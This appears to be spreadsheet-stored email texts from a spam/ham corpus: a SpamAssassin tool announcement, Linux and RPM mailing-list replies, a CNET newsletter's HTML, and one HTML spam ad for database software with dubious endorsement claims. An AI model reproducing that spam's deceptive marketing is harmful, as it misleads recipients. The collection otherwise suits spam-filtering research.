 The users are able to:
 - edit the blacklist and whitelist
 - edit required hits (score)
 - define a mailbox in which every spam mail is dropped
 Spamassassin settings made by the webinterfaxe are handled domain wide.
 You can download it from:
 -------------------------
 http://www.akitogo.com/download/spamAssassinCommunigateWebinterface.tar.gz
 Enjoy,
 Gunnar Lieb, akitogo OHG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</si>
  <si>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&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;P&gt;If you are struggling with MS Access to manage your data, don't worry because Bill Gates agrees that &lt;BR&gt;"Access is 
 confusing". &lt;BR&gt;&lt;BR&gt;If you are finding that MS Excel is fine as a spreadsheet 
 but doesn't allow you to build &lt;BR&gt;custom applications and reports with your data - don't 
  worry, there is an alternative. &lt;BR&gt;&lt;BR&gt;The good news is that 1 million customers have found a 
   really good alternative&lt;BR&gt;&lt;BR&gt;Try our 
 database software that does not make you feel like a dummy for free. Just email 
 &lt;A href="mailto:databasepro@btamail.net.cn?subject=Trial6a"&gt;Click Here&lt;/A&gt;  
   , &lt;BR&gt;to receive your free 30 day full 
   working copy of our award winning database. then you can decide for&lt;BR&gt;yourself. &lt;BR&gt;&lt;BR&gt;See why PC World describes our product as being "an 
   elegant, powerful database 
 that is easier than Access"&lt;BR&gt;and why InfoWorld says our database "leaves MS Access in the dust".&lt;BR&gt;&lt;BR&gt;We have been in 
   business since 1982 and are acknowledged as the leader in powerful BUT useable&lt;BR&gt;databases to solve your business and personal 
   information management needs. &lt;BR&gt;&lt;BR&gt;With this 
 database you can easily: &lt;BR&gt;&lt;/P&gt;
 &lt;UL&gt;
   &lt;LI&gt;Manage scheduling, contacts, mailings 
   &lt;LI&gt;Organize billing, invoicing, receivables, payables 
   &lt;LI&gt;Track inventory, equipment and facilities 
   &lt;LI&gt;Manage customer information, service, 
   employee,medical, and school records 
   &lt;LI&gt;Keep track and report on projects, maintenance and&amp;nbsp;&amp;nbsp;much more... &lt;BR&gt;&lt;BR&gt;To 
   be removed from this list &lt;A 
   href="mailto:cowboy1965@btamail.net.cn?subject=Remove"&gt;Click Here&lt;/A&gt;      
  &lt;BR&gt;&lt;/LI&gt;&lt;/UL&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] SMTP auth &amp; mutt
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney's [valen@tuatha.org] 11 lines of wisdom included:
 &gt;  OK, Mutt uses sendmail to deliver mail...
 &gt; 
 &gt;  How can I get it to deliver via a Postfix box with SMTP auth enabled ?
 Mutt interacts with smtpdaemon or something like that doesn't it?
 Can mutt interact directly with SMTP server with authentication
 capabilities? I don't think it can. 
 Surely you can just run a mailserver on your own machine and send
 mail using it? 
 -- 
   Philip Reynolds        
    RFC Networks          tel: 01 8832063
 www.rfc-networks.ie      fax: 01 8832041
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: RPM's %post, %postun etc
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; -----Original Message-----
 &gt; From: Torsten Bronger [mailto:bronger@physik.rwth-aachen.de]
 &gt; Sent: Wednesday, August 21, 2002 7:36 AM
 &gt; To: rpm-zzzlist@freshrpms.net
 &gt; Subject: Re: RPM's %post, %postun etc
 &gt; 
 &gt; 
 &gt; Halloechen!
 &gt; 
 &gt; On Mittwoch, 21. August 2002 08:37 schrieben Sie:
 &gt; &gt; Have you tried rebuilding your package on a system that has 
 &gt; a stock (or
 &gt; &gt; no) .rpmmacros file? Does it still build (and 
 &gt; install/uninstall) the way
 &gt; &gt; you intended it to?
 &gt; 
 &gt; It can't, because then %{texhash} is not defined.  But how 
 &gt; can I define a
 &gt; macro in the spec file?
 &gt; 
 http://www.rpm.org/rpmapi-4.1/macros.html
 &gt; The problem exists when someone wants to install many RPMs, among them
 &gt; mine.  Let's assume that every package that adds files to TeX's
 &gt; file tree runs texhash or equivalent.  This would be a desaster!
 &gt; There are only two solutions: (1) When installing many packages
 &gt; (maybe in context of a complete system installation), %post etc.
 &gt; are skipped and a complete update script is launched after *all*
 &gt; packages have been installed.  (2) I leave the taxhash thing out.
 &gt; But then the user would have to do it.
 &gt; 
 &gt; What's the way to go?
 &gt; 
 &gt; Tschoe,
 &gt; Torsten.
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">advice to the lovelorn haiku
 serendipity
 pilots synchronicity:
 turn the next corner.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
 Sent: Wednesday, September 18, 2002 7:13 PM
 To: R. A. Hettinga
 Cc: fork@example.com
 Subject: Re: AA Meetings the Hottest Place to Meet Women With Big Bucks
 On Wed, 18 Sep 2002, R. A. Hettinga wrote:
 --]AA Meetings the Hottest Place to Meet Women With Big Bucks
 And, as always, you can take a page out of Fight Club and start showing up
 at all sorts of support groups. Look what it did for Marla and Jack...
 "JACK You can't have *both* parasites. You take blood parasites and --
 MARLA I want brain parasites.
 She opens another dryer and does the same thing again. PG 19
 JACK Okay. I'll take blood parasites and I'll take organic brain dementia
 and --
 MARLA I want that.
 JACK You can't have the whole brain!
 MARLA So far, you have four and I have two!
 JACK Well, then, take blood  parasites. Now, we each have three.
 MARLA So, we each have three -- that's six. What  about the seventh day? I
 want ascending bowel cancer.
 JACK *I* want ascending bowel cancer.
 MARLA That's your favorite, too? Tried to slip it by me, huh?
 JACK We'll split it. You get it the first and third Sunday of the month.
 MARLA Deal."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Dell GX260 V Redhat 7.3
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; bad thing. Just a bad thing for those that hope a distro will 
 &gt; work out of
 &gt; the box.
 	It's still quite easy to find out, pre-purchase, what components if
 any are going to give you problems with a specific distribution/version.
 With Dell just check the support.dell.com site, match the system, look for
 downloadable drivers. From these if there aren't any linux drivers you can
 usually find out the chipset of each device. Plug them into google with
 "linux" and see what people have to say about them. Generally speaking when
 you buy the system you'll be told the make/model of each device rather than
 the chipset, so further investigation is necessary.
 	The cavaet, of course, is always to know exactly what you're buying.
 In most people's cases unfortunately it's not the person who bought the
 systems that will be configuring them.
 steve
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On 23 Aug 2002 at 2:57, Robert Harley wrote:
 &gt; It's an amusing anecdote, I don't know if it's true or not,
 &gt; but certainly nothing here supports the authoritative
 &gt; sounding conclusion "Status: False".
 I actually thought it was pretty funny and quite accurate.  Who cares if the spinmeisters are denying it?
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 01:17:25PM +0100, Patton, Tony wrote:
 &gt; On Tue, 2002-07-30 at 10:06, Donncha O Caoimh wrote:
 &gt; &gt; Ar mhaith le einne anseo caint le TG4 faoin LBW?
 &gt; &gt; 
 &gt; &gt; Donncha.
 &gt; &gt; 
 &gt; 
 &gt; ----8&lt;
 &gt; 
 &gt; &gt; T m ag danamh taighde don clr teilifse An Tuath Nua (a bhonn 
 &gt; &gt; chraoladh ar TG4) faoi lthair, agus chonaic m go mbedih an Linux Beer
 &gt; &gt; Hike ar sil i Doolin i mbliana. Bheadh spis againn mr a dhanamh mar
 &gt; &gt; gheall ar an Hike ar an gclr - an mbeidh t fin n aon duine eile le
 &gt; &gt; Gaeilge ar an Hike go bhfios duit?
 &gt; &gt; 
 &gt; &gt; Go raibh maith agat as do chabhair,
 &gt; &gt; 
 &gt; 
 &gt; ----&gt;8
 &gt; 
 &gt; Can someone translate this for me? Lost all sense of Irish when moved
 &gt; over the border about 10 years ago. Not by choice mind you :-(
 "Currently, I am doing some research for the telivision programme 
 "An Tuath Nua"  (which is broadcast by TG4) , and I saw that the
 Linux Beer Hike will be in Doolin this year. We'd be intrested 
 in including a report on the hike in the programme - will yourself
 or anyone else with Irish be on the Hike do you know ?
 Thanks for your help."
 -- 
 colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  
 Web:                                 http://devnull.redbrick.dcu.ie/ 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;&lt;head&gt;&lt;title&gt;Internet Services Weekly Newsletter&lt;/title&gt;&lt;/head&gt;
 &lt;body bgcolor=3D"#eeeeee"&gt;&lt;center&gt;
 &lt;a href=3D"top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612 bgcolor=3D"#f=
 fffff"&gt;
 &lt;tr valign=3Dtop&gt;&lt;td width=3D442 colspan=3D4&gt;&lt;img src=3D"http://www.cnet.co=
 m/i/nl/ws/hd.gif" width=3D442 height=3D60 alt=3D"Internet Services Weekly N=
 ewsletter"&gt;&lt;br&gt;
 =09=09=09&lt;table width=3D442 cellpadding=3D0 cellspacing=3D0 border=3D0 bgco=
 lor=3D"#ffcc00"&gt;
 =09=09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000" colspan=3D3&gt;&lt;img src=3D"http://home=
 .cnet.com/b.gif" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09=09=09&lt;tr&gt;
 =09=09=09=09=09&lt;td bgcolor=3D"#000000" width=3D1 rowspan=3D2&gt;&lt;img src=3D"ht=
 tp://home.cnet.com/b.gif" width=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09=09&lt;td width=3D10 rowspan=3D2&gt;&lt;img src=3D"http://home.cnet.com/=
 b.gif" width=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09=09&lt;td  width=3D430&gt;&lt;img src=3D"http://home.cnet.com/b.gif" wid=
 th=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09&lt;/tr&gt;
 =09=09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.=
 gif" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       =09=09&lt;/table&gt;=09
 =09&lt;/td&gt;
 &lt;!-- Skyscraper column --&gt;
 =09&lt;td width=3D160 rowspan=3D2&gt;
 =09=09&lt;img src=3D"http://home.cnet.com/i/dp/dd_b.gif" width=3D"160" height=
 =3D"18" border=3D"0"&gt;&lt;br&gt;
 =09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D160&gt;
 =09=09&lt;tr&gt;&lt;td align=3Dcenter bgcolor=3D"#eeeeee"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09&lt;/table&gt;
 &lt;!-- tower ad --&gt;
 &lt;div align=3D"center"&gt;&lt;img src=3D"http://i.i.com.com/cnwk.1d/Ads/common/adv=
 ertisement.gif" width=3D"120" height=3D"10" border=3D"0"&gt;&lt;/br&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D0f-RM2lIqjktmdPkg9sUb9HGRJ=
 1bfZR" target=3D"new"&gt;  =20
 &lt;img src=3D"http://www.techrepublic.com/images/ads/MAP BBQ_skyscraper.gif" =
 width=3D"160" height=3D"600" border=3D"0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /tower ad --&gt;&lt;!-- right column content --&gt;
 &lt;!-- most popular NEWSLETTER --&gt;
 &lt;br&gt;&lt;img src=3D"http://www.cnet.com/i/nl/ws/rhc_pop.gif" width=3D150 height=
 =3D20 alt=3D"Most Popular"&gt;
 &lt;br&gt;&lt;font face=3D"arial, helvetica" size=3D-1 color=3D#333333&gt;
 &lt;b&gt;Reseller Accounts&lt;/b&gt;&lt;br&gt;&lt;table width=3D150 cellpadding=3D2 cellspacing=
 =3D0 border=3D0&gt;&lt;tr valign=3Dtop&gt;&lt;td&gt;&lt;font face=3D"arial, helvetica" size=
 =3D-2&gt;&lt;b&gt;1.&lt;/b&gt;&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D24-8D=
 dMIcz6q--8CI6geUef92iqrwdR" &gt;Infinology&amp;nbsp;Corp.&lt;/a&gt;, &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D39-7QgMIjI6y-waTUCCGLs-y39w-_cR" &gt;$59&lt;/a&gt;&lt;br&gt;=
 &lt;b&gt;2.&lt;/b&gt;&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D4e-0Y95InZA=
 4ufV6aJIKlsTn8N_JjiR" &gt;ReadyHosting.com&lt;/a&gt;, &lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3D63-tPKjIHWSsaa7VWtg_9-hwkp_WElR" &gt;$4.12&lt;/a&gt;&lt;br&gt;&lt;b&gt;3.&lt;/b&gt;=
 &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D78-d5asIdUDx-1LLqR5v=
 nMUN5xspo4R" &gt;Aplus.Net&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D8d-nbL1Q7no54XkOhpIiSupcptbPMuR" &gt;$79.95&lt;/a&gt;&lt;br&gt;&lt;b&gt;4.&lt;/b&gt;&amp;nbsp;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3Da2-6-M7QXZxTvb9b-K9R0CGk_HtsosR" =
 &gt;One&amp;nbsp;World&amp;nbsp;Hosting&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Cl=
 ick?q=3Db8-smr2QQUwcaz9HOOlq9S_p8qkEi9R" &gt;$10&lt;/a&gt;&lt;br&gt;&lt;b&gt;5.&lt;/b&gt;&amp;nbsp;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3Dcd-VHhSQzsKThHat4OFjAi_TOlRfXuR" =
 &gt;Superb&amp;nbsp;Internet&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3De2-J1OpQhyziskjKKBENBEZdihv9KsR" &gt;$5&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;font face=3D"ari=
 al, helvetica" size=3D-1&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Df=
 7-N0QnQLgzoJWajWNlrZIGiR6ImOZR" &gt;&lt;b&gt;More providers&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;=
 /tr&gt;&lt;/table&gt;
 &lt;!-- /most popular NEWSLETTER --&gt;
 &lt;br&gt;
 &lt;!-- Vertical Brick --&gt;
  &lt;IMG alt=3D"Also from CNET" height=3D20 src=3D"http://home.cnet.com/Ads/Me=
 dia/Images/RHC_ALSOfromCNETnet.gif" width=3D150 NOSEND=3D"1"&gt;&lt;BR&gt;
 &lt;TABLE border=3D0 cellPadding=3D2 cellSpacing=3D0 width=3D150&gt;&lt;TBODY&gt;&lt;TR vA=
 lign=3Dtop&gt;
 &lt;TD&gt;&lt;FONT face=3D"arial, helvetica" size=3D-1&gt;&lt;B&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D0c-_Y3DIc8HTzkCJaQWDjP2qJ1=
 3b4dR" &gt;Live tech help now&lt;/a&gt;&lt;p&gt;=20
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D21-UPROIjdDVFrmG_8oQqYoj1c=
 TQ4cR" &gt;May's Editors' Choice&lt;/a&gt;&lt;p&gt; =20
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D36-wg7-IiI4oUHRfj_MxvH3Qai=
 nXQRR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;=20
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D4b-k_l7IBUPPQwb39aP9VA35c5=
 4JMlR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;=20
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D61-x9oAIoLj9Wf2Yu24JYndFK-=
 AWlrR" &gt;ZDNet: PeopleSoft &lt;/a&gt;=20
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 &lt;/td&gt;&lt;td width=3D9 rowspan=3D2&gt;&lt;img src=3D"http://www.cnet.com/i/nl/dd_c.gi=
 f" width=3D9 height=3D60&gt;&lt;br&gt;
 &lt;table width=3D9 cellpadding=3D0 cellspacing=3D0 border=3D0&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D9 height=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#ffccoo"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D10&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000" rowspan=3D2&gt;&lt;table width=3D1 cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#eeeeee"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D60&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D410 bgcolor=3D"#ffffff"&gt;
 =09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D410 bgcolor=
 =3D"#ffffef"&gt;
 =09=09=09&lt;tr valign=3Dtop&gt;
 =09=09=09&lt;td width=3D10&gt;&lt;img src=3D"http://home.cnet.com/b.gif" alt=3D"" wi=
 dth=3D"10" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09&lt;td width=3D412&gt;
 =09=09
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"3" b=
 order=3D"0"&gt;&lt;br&gt;
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"10" height=3D"1" =
 border=3D"0"&gt;&lt;font face=3D"Arial, Helvetica" size=3D"-2"&gt;July 11, 2002&lt;/fon=
 t&gt;&lt;br&gt;
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"3" b=
 order=3D"0"&gt;&lt;br&gt;
 =09=09=09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D412&gt;
 =09=09=09=09&lt;tr valign=3Dtop&gt;
 =09=09=09=09=09&lt;td width=3D76 align=3Dright&gt;
 =09=09=09=09=09=09&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/nl/sw/lindseyt.gi=
 f" width=3D66 height=3D86&gt;&lt;br&gt;
 =09=09=09=09=09=09&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#666=
 666"&gt;
 --&lt;A HREF=3D"mailto:software_mailbag@cnet.com"&gt;Lindsey Turrentine&lt;/A&gt;&lt;br&gt;
 Senior editor&lt;br&gt;
 CNET Software and Internet&lt;br&gt;&lt;/font&gt;
 =09=09=09&lt;/td&gt;&lt;td width=3D10&gt; &lt;/td&gt;
 =09=09=09&lt;td&gt;&lt;font face=3D"Arial, Helvetica"&gt;
 =09=09=09&lt;font color=3D"#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 =09=09=09&lt;font size=3D"-1"&gt;
 Your ISP, if it's anything like mine, works like a very large
 boat: It moves slowly, it turns slowly, and sometimes it leaks.
 Take rogue wireless networks, for example. For many months now,
 some mischievous entrepreneurs have been hacking into major ISP
 networks and siphoning off bandwidth for neighborhood wireless
 networks. Only now, months later, are broadband bigwigs &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D76-vJf7InBP3QcLqhr1okYP2r70U6iR" &gt;&lt;B&gt;doing
 something about it&lt;/b&gt;&lt;/a&gt;. And what
 about ISP hackers? Could they break into your service provider?
 Probably. Thankfully, you can protect yourself against most of
 these leaks. Let Dan Tynan, our ISP guru, &lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D8b-SBGBQY0y_2bkiJ1EYIEElDh4B1FR" &gt;&lt;B&gt;show you how&lt;/b&gt;&lt;/a&gt;.
 &lt;P&gt;
 =09=09&lt;/td&gt;
 =09=09=09&lt;/tr&gt;
 =09=09=09=09&lt;/table&gt;
 =09=09=09=09&lt;/td&gt;
 =09=09=09=09&lt;td width=3D8&gt;&lt;img src=3D"http://home.cnet.com/b.gif" alt=3D"" =
 width=3D"8" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09&lt;/tr&gt;
 =09=09&lt;/table&gt;
 &lt;!--Info Button Bar Web Hosting --&gt;
 &lt;table cellpadding=3D0 width=3D"100%"&gt;
   &lt;tr&gt;
     &lt;td align=3Dcenter&gt;
       &lt;table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0=
 "&gt;
 =09    &lt;tr&gt;
 =09=09  &lt;td align=3D"center" colspan=3D"5"&gt;&lt;img src=3D"http://www.cnet.com/=
 Ads/Media/Images/ad10-dk.gif" width=3D"120" height=3D"10" alt=3D"advertisem=
 ent"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign=3D"middle"&gt;
           &lt;td colspan=3D"5" bgcolor=3D"#999999" height=3D"15" class=3D"w"&gt;&lt;=
 b class=3D"v1"&gt;&lt;font face=3D"verdana,geneva,helvetica" size=3D"-2" color=3D=
 "#ffffff"&gt;&lt;b&gt; Quick links to Services &amp; Prices from these companies&lt;/b&gt;&lt;/fo=
 nt&gt;&lt;br&gt;&lt;/td&gt;
         &lt;/tr&gt;
 =09=09&lt;tr valign=3D"middle" align=3D"center" bgcolor=3D"#eeeeee"&gt;
 =09=09  &lt;td height=3D"35"&gt; &lt;/td&gt;
 =09=09  &lt;FORM action=3Dhttp://www.cnet.com/cgi-acc/clickthru.acc method=3Dg=
 et&gt;
 =09=09  &lt;td width=3D"50%" align=3D"center"&gt;
 =09=09  &lt;INPUT name=3Durl type=3Dhidden value=3Dhttp://home.cnet.com/go/to?=
 tag=3Dex.ws.ros.disptchbut.dellhost-disptch&amp;destUrl=3Dhttp%3a%2f%2fwebservi=
 ces.cnet.com%2fcgi%2fpremier.asp%3fcid%3d1006102&gt;&lt;INPUT type=3Dsubmit value=
 =3D"    DellHost    "&gt;&lt;/td&gt;&lt;/form&gt;&lt;FORM action=3Dhttp://www.cnet.com/cgi-ac=
 c/clickthru.acc method=3Dget&gt;
 =09=09  &lt;td width=3D"50%" align=3D"center"&gt;
 =09=09  &lt;INPUT name=3Durl type=3Dhidden value=3Dhttp://home.cnet.com/go/to?=
 tag=3Dex.ws.ros.disptchbut.aplus-disptch&amp;destUrl=3Dhttp%3a%2f%2fwebservices=
 .cnet.com%2fcgi%2fpremier.asp%3fcid%3d1000015&gt; &lt;INPUT type=3Dsubmit value=
 =3D"    Aplus.Net   "&gt;&lt;/td&gt;&lt;/form&gt;
 =09=09  &lt;td&gt; &lt;/td&gt;
 =09=09&lt;/tr&gt;
 =09  &lt;/table&gt;   =20
 =09&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--/Info Button Bar Web Hosting --&gt;
 =09&lt;!-- bottom rule --&gt;
 =09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D410&gt;
 =09&lt;tr valign=3Dtop&gt;
 =09=09&lt;td bgcolor=3D"#F7D69C"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=
 =3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;/tr&gt;
 =09&lt;/table&gt;
 =09
 &lt;table border=3D"0" width=3D"100%" cellpadding=3D"10" cellspacing=3D"0"&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;img src=3D"http://www.cnet.com/i/gl/new-cc.gif" alt=3D"Crucial Clicks" wid=
 th=3D"120" height=3D"19" border=3D"0"&gt;&lt;br&gt;
 &lt;table width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" border=3D"0" bgc=
 olor=3D"#ffffff"&gt;
 &lt;tr bgcolor=3D"#cccccc"&gt;&lt;td colspan=3D"7"&gt;&lt;img src=3D"http://home.cnet.com/=
 b.gif" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor=3D"#cccccc" rowspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" height=3D1 width=3D1&gt;&lt;/td&gt;
 &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D1 width=
 =3D5&gt;&lt;/td&gt;
 &lt;td colspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D5 width=
 =3D1&gt;&lt;/td&gt;
 &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D1 width=
 =3D5&gt;&lt;/td&gt;
 &lt;td bgcolor=3D"#cccccc" rowspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" height=3D1 width=3D1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=3D"top"&gt;
 &lt;td width=3D"100%"&gt;
 =09&lt;table width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;
 =09&lt;tr valign=3D"top"&gt;
 =09&lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Da0-11h=
 8QQBqXB2HwGiUByjw2PB1s79R" &gt;&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/p/03210=
 2_megapixcameras.jpg" width=3D"85" height=3D"110" border=3D"0" alt=3D"" /&gt;&lt;=
 /a&gt;&lt;/td&gt;
 =09&lt;td width=3D"5"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D1 width=
 =3D5&gt;&lt;/td&gt;
 =09&lt;td width=3D"100%"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3Db5-50FcQ7U7vBndU_R1PHq15ZNEEZuR" =
 &gt;&lt;b&gt;5-megapixel shoot-out&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;Not all high-res cameras were create=
 d alike. We put four to the test to find out what sets each apart.&lt;/font&gt;&lt;/=
 td&gt;
 =09&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D3=
  width=3D1&gt;&lt;br /&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;
 =09&amp;#149; &lt;a href=3D"http://clickthru.online.com/Click?q=3Dca-iciuQUgFRmzCV=
 TQcl8jfOfRHHUsR" &gt;Cameras coming soon&lt;/a&gt;&lt;br /&gt;
 =09&amp;#149; &lt;a href=3D"http://clickthru.online.com/Click?q=3De0-cISRQfDH08pTG=
 wYkPhB7mxUT9A9R" &gt;Point-and-shoot picks&lt;/a&gt;&lt;br /&gt;
 =09&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;/table&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;
 &lt;td width=3D"180"&gt;
 =09&lt;table cellpadding=3D"0" cellspacing=3D"0" width=3D"180" border=3D"0" bg=
 color=3D"#ffffef"&gt;
 =09&lt;tr&gt;&lt;td colspan=3D"5" bgcolor=3D"#666666"&gt;&lt;img src=3D"http://home.cnet.c=
 om/b.gif" width=3D"1" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;tr&gt;
 =09&lt;td bgcolor=3D"#666666"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D=
 "1" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;
